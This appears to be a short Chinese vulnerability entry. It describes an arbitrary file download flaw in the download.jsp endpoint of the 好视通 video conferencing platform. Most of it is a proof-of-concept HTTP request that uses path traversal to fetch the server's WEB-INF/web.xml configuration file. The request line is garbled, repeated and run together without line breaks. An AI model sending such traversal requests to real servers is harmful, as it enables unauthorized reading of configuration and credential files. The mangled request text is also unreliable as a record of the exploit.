漏洞描述
/
好视通视频会议平台 /dbbackup/adminMgr/download.jsp 路径存在任意文件下载
PoC代码
GET /dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml HTTP/1.1GET /dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml HTTP/1.1